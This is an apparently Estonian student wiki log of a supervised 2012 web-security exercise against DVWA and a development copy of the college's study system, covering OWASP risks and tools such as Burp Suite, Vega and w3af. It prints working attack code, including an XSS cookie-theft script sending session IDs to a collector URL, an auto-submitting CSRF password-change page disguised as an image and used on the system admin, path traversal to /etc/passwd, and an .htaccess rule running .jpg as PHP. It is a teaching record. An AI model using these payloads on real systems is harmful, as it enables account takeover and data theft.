== 4. päev - Presentatsiooni tegemine ja esitlemine ==

Koostasime presentatsiooni ja esitlemine.

[[Media:Security_team_presentation.ppt]]

== Arvamused intensiivõppe nädala kohta ==

Sander: Õppisime erinevaid testprogramme ja testkeskkondi kasutama, mida varem kunagi kasutanud polnud. Suutsime avastada nii mõnegi vea, mida varem avastatud ei olnud. Usun, et ÕIS on nüüd kasvõi veidigi turvalisem. Soovitan ka teistele tudengitele intensiivõppenädalal osalemist, kuna valides õige teema võib olla päris huvitav tegeleda millegagi, mida varem teinud pole või mida tegelikult lihtsalt ei ole lubatud teha.

Urmo: Intensiivõppe nädalaga sai õpitud nii mõndagi huvitavat veebiturve ja selle testimise kohta. Kuna aega oli vähe, siis sai hulgaliselt kogemust ja oskust reaalselt planeerida mahukat tööd täiesti nullist kuni reaalse rakendatava tulemuseni ning pani proovile stressitaluvuse tõestamaks pinge all jätkusuutlikku töötamist. Intensiivõppe nädalal võiksid osaleda kõik, kellel väheke tahtmist midagi uurida ja korda saata ning saada reaalset töökogemust ennem töömaailma sukeldumist.

== Tegijad ==
Alo Konno A21

Urmo Lihten A21

Taavi Podžuks A22

Matis Alliksoo A22

Sander Saarm A22

== Juhendajad ==
Mart Mangus

Margus Ernits

Valter Kungla

Security team

2012-03-30T17:29:58Z

Ulihten: /* Arvamused intensiivõppe nädala kohta */

== 1. päev - Materjalidega tutvumine ==

<h1>Valmimisel!</h1>

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

A1: Injection - Urmo
A2: Cross-Site Scripting (XSS) - Alo
A3: Broken Authentication and Session Management - Sander
A4: Insecure Direct Object References - Alo
A5: Cross-Site Request Forgery (CSRF) - Taavi
A6: Security Misconfiguration - Matis
A7: Insecure Cryptographic Storage - Matis
A8: Failure to Restrict URL Access - Urmo
A9: Insufficient Transport Layer Protection - Taavi
A10: Unvalidated Redirects and Forwards - Sander

Sanderi konspekt: [[Media:Ois_materjal.pdf]] <br>
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] <br>
Taavi esitlus [[Media:A9.pdf]] <br>
Taavi esitlus [[Media:A5.pdf]] <br>
Matise esitlus [[Media:Insecure Cryptographic Storage.pdf]] <br>
Matise esitlus [[Media:Security Misconfiguration.pdf]] <br>
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] <br>

== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==
===Security Team tegevusplaan===
1. Päev
1.1 Tutvuda OWASP’iga.
1.2 Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.
1.3 Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.
2. Päev
2.1 Esitada tiimi tegevusplaan.
2.2 Tutvuda turvariskidega natuke põhjalikumalt.
2.3 Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.
2.4 Täiendada esimese päeva ettekannet.
3. Päev
3.1 Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.
3.2 Saadud tulemuste dokumenteerimine.
4. Päev
4.1 Saadud tulemuste esitlemine ettekandega
5. Päev
5.1 Tulemuste parandamine wiki’s.

=== Alo tegevus ===

http://www.acunetix.com/support/vulnerability-checks.htm
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting
http://www.youtube.com/watch?v=SG1cvGQ971g
http://www.isecom.org/research.html
http://evuln.com/tools/
http://sectools.org/tag/web-scanners/
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/
http://www.acunetix.com/vulnerability-scanner/getting-started.htm

Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:
Acunetix Web Vulnerability Scanner v. 8
http://www.acunetix.com/vulnerability-scanner/

Pärast programmi installimist tuli seadistada skännimine, valisime keskmie põhjalikkusega skänni.
Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.
Antud programm võimaldab skännida:
Cross-Site Scripting (XSS)
SQL Injection (blind test)
File inclusion
Code Execution
LDAP Injection
Cross Frame Scripting
SQL Injection (error msg. test)
CRLF Injection
Directory Travelsal
XPath Injection
URL Redirection
Application Error Message

Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.

=== Urmo tegevus ===

Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.

Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application'i.

==== Brute Force (DVWA) ====
Käsitsi välja uuritud login andmed:
kasutajanimi: admin
parool: password

===== Fireforce plugin Firefoxis =====
Tekitatud sai ka password list faili pass.txt.

Kasutusel oli Firefox brauser, kuhu installisime plugin'a Fireforce.
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .

Panime kasutajanimeks "admin" ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud.
Selleks sai sõna "incorrect".
Määrata ära tuli ka, et mitu päringut sekundis tehakse.
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada.
Päringute tegemise kiirus vähem kui 1 päring/sekundis.

Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.
Kasutasime ka videos näidatud "@ DICTIONARY" teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.

Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.

===== Burpsuite v1.4 =====
Burpsuite v1.4 on Samurai WTF'il olemas juba sees ja saab kohe käima panna.
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI'st]]

Programm on juba loomult keerulisem.
Burpsuite'iga tuleb panna käima proxy server localhost'is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine.
Läbi proxy serveri tuleb BurpSuite'ile kohale vastava veebilehe Header sisselogimise kohta.
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.
Payload'i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.
Ründe stiiliks määrata Pitchfork.
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -> Start Attack, mis siis alustas rünnet.
Kahjuks ka see rünne ei toiminud teadmata põhjusel.
Proovitud sai ka lühemate nimekirjadega ja edutult.

Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt.
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.

Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.

==== CSRF - Cross-site request forgery ====
Katsetamine toimub koos Taaviga.

Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.

Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.

Lõime uue faili - crosssite.txt

DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.
Võtsime lehe Source Code lahti
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.
Current Password lahtri jätsime samaks.
Ülejäänud kahe uue passwordi fieldi type'iks määrasime "Hidden" ja value'deks "admin".
Salvestasime faili ja käivitasime selle.
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna ".

Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.

=== Taavi tegevus ===

Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.

=== Matise tegevus ===
==== Reflected Cross Site Scripting (XSS) ====
<ul>
<li>Lehel on selline Form:</li>
[[Image:Xsstesting.jpg|Location="left"|Caption|]]
<br>Form väljastab : Hello „sisestatud nimi“
<li>Easy puhul:</li>
<li>Saab sisestada textboxi skripti:</li>
<script>
alert(document.cookie.match(/PHPSESSID=[^;\]+/));
</script>
<li>Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.</li>
<li>Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: </li>
<script>
this.document.location.href = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);
</script>
<li>Saab kohe enda veebiserveri logidest näha Session ID’d.
<br>Näide logist:</li>
/var/log/apache2/access.log
127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] "GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1" 404 404 "-" <br> "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11"
<li>Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.</li>
</ul>

=== Sanderi tegevus ===
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]

SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).
==== Faili üleslaadimine: madal tase ====
<ul>
<li><b>DVWA Security</b> määrata: Low -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess</li>
Üleslaetavasse *.php faili saab kirjutada php koodi:
<?php var_dump($_REQUEST, $_SERVER); ?>
<li>Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:</li>
esimeses massiivis "PHPSESSID" ("2b1ae19446cfde009664f18df51b6ec1") ja turvatase "security" ("low");
teises "HTTP_COOKIE", milles on eelnevadki andmed; asukoht "PATH", "SERVER_SOFTWARE", "SERVER_NAME",
"SERVER_ADDR" ("127.42.84.1"), "SERVER_PORT" ("80"), "REMOTE_ADDR" ("127.42.84.1"), "REMOTE_PORT" ("53425") jpm.
</ul>

==== Faili üleslaadimine: keskmine tase ====
<ul>
<li><b>DVWA Security</b> määrata: Medium -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida ei saa näiteks järgnevates formaatides faile:</li>
.htaccess
.php .html .pdf
.gif .png .bmp
.svg .swf
.tif .tiff .exif
.raw .cgm
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
<li>Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:</li>
http://dvwa/hackable/uploads/*.jpg
<li>Skripti käivitamiseks tuleb kasutada "?page=" ja faili asukoht:</li>
http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg
Kuvatakse php skripti tulemus.
Kommentaar: "?page=" kasutamine võetud menüüvalikust: <b>File Inclusion</b>
<li>"?page=" abil saab vaadata kasutajate nimesid:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd
<li>Paroole vaadata ei saa, selleks õigused puuduvad:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow
</ul>

==== Faili üleslaadimine: kõrge tase ====
<ul>
<li><b>DVWA Security</b> määrata: High -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.</li>
<li>Skripti käivitamiseks ei piisa ka "?page=" kasutamisest. Igal juhul on vastus selline:</li>
ERROR: File not found!
<li>Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:</li>
http://www.motobit.com/util/base64-decoder-encoder.asp
<li>Moodustades loodud faili asukohast kood ja kasutades</li>
data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:
http://dvwa/hackable/uploads/*.jpg
</ul>

== 3. päev ==

=== Alo tegevus ===
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.<br>
Faile saab alla laadida enda profiili all õppesooritustes.<br>
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.<br>
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.<br>
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.<br>
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.<br>
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.<br>

=== Urmo tegevus ===
====Subgraph Vega ====
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.
Programm on Java põhine graafilise liidesega ja töötab Linux'i, OS X ja Windowsi peal.

[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.

Alustasime uut skänni (Start New Scan).
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.

Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised.

Me lisasime ainult küpsise (cookie) sisu:
<pre>
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221
</pre>
ning Finish.

[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).

Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000.

Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script'ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body nõrkust.

Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID'sid ja parameetreid ära oma pealkirjades.
Õnneks parameetritega väljad olid veebilehel korralikult ära escape'itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.

ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.

==== Wapiti ====
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti.
(Koduleht: http://wapiti.sourceforge.net/)

Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS'iga midagi teha.

==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====
=====1. katse - ÕISi keskkkonna keelevahetus =====
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]

Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.

Võtsime dev-ÕIS'i Source Code'ist välja vastava formi osa ja panime eraldi html faili.
Koristasime mittevajaliku disaini koodi juurest ära.
Muutsime form'i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks "en" ehk inglise keelne keskkond tekiks.
Panime koodi enose veebiserverisse üles nimega ois.html.

Faili sisu:
<source lang="html4strict">
<form id="settingsForm" method="post" action="https://itcollege.dev.ois.ee/setting/edit?user_id=2198"
enctype="application/x-www-form-urlencoded">
<input type="hidden" AUTOCOMPLETE="off" name="default_language"value="en">
<br>
<input type="submit" value="Salvesta seaded" name="Savesettings">
</form>
</source>
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.

Katsetas koodi enda konto peal Taavi.

=====2. katse - ÕIS'i kasutaja parooli muutmine =====

[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.

Selle jaoks uurisime välja, kus asub dev-ÕIS'i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.

Muutsime password ja password_check lahtrite väärtused järgnevaks: "test123" ehk kasutaja uus parool peale rünnakut.

Lahtrites muutsime user_id'd sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.

Kõik vormi lahtrite tüübid määrasime peidetud ehk "hidden", et poleks midagi näidata.

Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist.
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.

Lisasime CSS koodi Submit nupu ära peitmiseks.
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.

Salvestasime faili ära kui "screen1.jpg" fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.

Faili sisu:
<source lang="html4strict">
<html>
<head>
<style type="text/css">
#Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }
</style>
</head>
<body>
<body onload="document.forms.setPasswordForm.submit();">
<form name="setPasswordForm" id="setPasswordForm"
action="https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&continue=/auth/logout"
method="post">
<input type="hidden" name="user_id" value="2227" id="user_id" />
<input type="hidden" name="continue" value="%2Fet%2Fsetting%3Fuser_id%3D2227" id="continue" />
<input type="hidden" name="password" id="password" value="test123" />
<input type="hidden" name="password_check" id="password_check" value="test123" />
<input type="submit" name="Setpassword" id="Setpassword" value="Muuda salasõna" />
</form>
</body>
</html>
</source>

[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]

Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.
<pre>
AddType application/x-httpd-php .php .jpg
</pre>

Laadisime mõlemad failid Enose veebiserverisse avalikult.

Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki.
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle.
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail.
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja.
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud "test123"-ks ja me saime ligipääsu administraatori õigustes kontole.
Rünnak oli edukas.
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]

Andsime teada Valterile teada, et tegelikult tegime salajase ründe.
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha.
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug'iga.

Kuna tegu oli ÕIS'i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.

=== Taavi tegevus ===
===Burp suite===

Esimese asjane peale Burp suite käivitamist. Tabilt proxy ->intercept ->intercept off<br>
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)<br>
Proxy -> options alt lülitada sisse proxy listner pordile 8080 .<br>
Ohvri valimine <br>
Valida intruder -> target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.<br>
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.<br>
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.<br>site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.<br>
Targer->scope -> exclude frome scope ja veenduda at välja on arvatud logout laused.<br>
Spideringi sisselülitamine <br>
Valida tab Spide ning sealt panna linnuke kasti spider running.<br>
Ning oledki valmis saama laheküljelt infot.<br>
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.<br>
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.

==Nessuse algkäivitamine==
Valida backtrackist vulnerability scannerite alt nessus ning edasi nessus register .<br> Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.<br> Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)<br>
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)<br>
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.<br>
Järgnevalt valida nessus start.<br>
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.<br>
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.

=== Matise tegevus ===
==Väike upload tegevus, mis võiks olla teisiti==
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.
Proovisime üles laadida:
<li>filmi
<li>exe
<li>jpm faile
<br>kõik läks läbi ja sai uploadida.
<br>Sellises kohas võiks olla süsteem tehtud <b>whitelisti</b> põhimõttel,
<br>et lubatud oleks ainult:
<li>.doc
<li>.docx
<li>.pdf

=== Sanderi tegevus ===
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]
Backtarcki keskkonnas sai testitud programmi w3af.

==== Backtrack: w3af ====
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]
Võimalik kätte saada SSL Certificate.
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:
https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?
username=<font color="red">KASUTAJANIMI</font>&continue=&Login=Logi sisse&pw=<font color="red">PAROOL</font>
Programmi sisestatud andmetega ka mitte:
Configuration -> HTTP Config -> Basic HTTP Authentication:
basicAuthUser: <font color="red">KASUTAJANIMI</font>
basicAuthPass: <font color="red">PAROOL</font>
basicAuthDomain: http://itcollege.dev.ois.ee
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:
Configuration -> HTTP Config -> Cookies
cookieJarFile: /root/Desktop/<font color="red">ois_cookie.txt</font>
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:
# Netscape HTTP Cookie File
.dev.ois.ee TRUE / FALSE 1731510001 itcollege_OIS_SESSION_ID <font color="red">870aqllryuw3cmf6cv8ellha03</font>
Esimene rida on nõutav! Teiste tähendused:
domain - The domain that created and that can read the variable.
flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.
This value is set automatically by the browser, depending on the value you set for domain.
path - The path within the domain that the variable is valid for.
secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.
expiration - The UNIX time that the variable will expire on.
name - The name of the variable.
value - The value of the variable.
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:
Edit -> Preferences -> Privacy -> History -> remove individual cookies
Search: itcollege.dev.ois.ee
Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID

Skänneerimine:
<ul>
<li>The page language is: en</li>
<li>The URL: "https://itcollege.dev.ois.ee/" has a "<form>" element with auto-complete enabled.</li>
<li>A comment with the string "<p>tunne end kui koolis</p>" was found in: "https://itcollege.dev.ois.ee/".</li>
<li>Found a form login. The action of the form is: "https://itcollege.dev.ois.ee/auth/login".</li>
The username field to be used is: "username".
The password field to be used is: "pw".
<li><font color="red">Found authentication credentials to: "https://itcollege.dev.ois.ee/auth/login". A correct user and password combination is: Administrador/6666666</font></li>
Antud kasutaja ja parooliga sisse ei saanud.
<li>The URL: "https://itcollege.dev.ois.ee/" returned a response that may contain a "SHA1" hash. The hash is: "c7b39896de5f296b5a44c2dfcd9f0600b2cf424d". This is uncommon and requires human verification.</li>
Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.
<li>The URL: "https://itcollege.dev.ois.ee/" sent these cookies:</li>
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/
<li>The SMTP settings in emailReport plugin seem to be incorrect. Original error: "[Errno 111] Connection refused".</li>
Kui tuleb see veateade, siis skänn katkeb.
<li><font color="red">The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):</font></li>
The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
<li><font color="red">SQL injection in a Unknown database was found at: "https://itcollege.dev.ois.ee/auth/login", using HTTP method POST.</font></li>
The sent post-data was: "username=John8212&security_key_sis_global=d'z"0&Login=Logi%20sisse&continue=56&pw=FrAmE30.".
The modified parameter was "security_key_sis_global". This vulnerability was found in the request with id 390.
<li>Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt</li>
User-agent: *
Disallow: /
Allow: /curriculum
Allow: /subject
Allow: /diploma
Allow: /schedule/ical
</ul>

== 4. päev - Presentatsiooni tegemine ja esitlemine ==

Koostasime presentatsiooni ja esitlemine.

[[Media:Security_team_presentation.ppt]]

== Arvamused intensiivõppe nädala kohta ==

Sander: Õppisime erinevaid testprogramme ja testkeskkondi kasutama, mida varem kunagi kasutanud polnud. Suutsime avastada nii mõnegi vea, mida varem avastatud ei olnud. Usun, et ÕIS on nüüd kasvõi veidigi turvalisem. Soovitan ka teistele tudengitele intensiivõppenädalal osalemist, kuna valides õige teema võib olla päris huvitav tegeleda millegagi, mida varem teinud pole või mida tegelikult lihtsalt ei ole lubatud teha.

